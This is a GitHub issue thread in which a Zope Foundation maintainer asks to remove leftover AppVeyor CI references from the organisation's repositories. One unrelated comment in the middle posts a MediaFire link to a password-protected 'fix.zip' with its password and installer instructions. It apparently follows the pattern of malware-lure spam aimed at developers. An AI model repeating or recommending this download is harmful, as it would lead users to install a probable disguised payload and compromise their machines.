### ISSUE TITLE
Remove AppVeyor references

### ISSUE THREAD

**Issue by icemac** [zopefoundation/meta#268]
We are no longer utalizing AppVeyor, so let's remove it where it is still referenced:

* https://github.com/search?q=org%3Azopefoundation+NOT+is%3Aarchived+appveyor&type=code

e. g. badges, `.meta.toml`, …

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by icemac** [comment]
`zope.server` is not yet on 3.12 because of https://github.com/zopefoundation/zope.server/issues/16, so we might archive it.

Thank you for ripping out all these AppVeyor references.
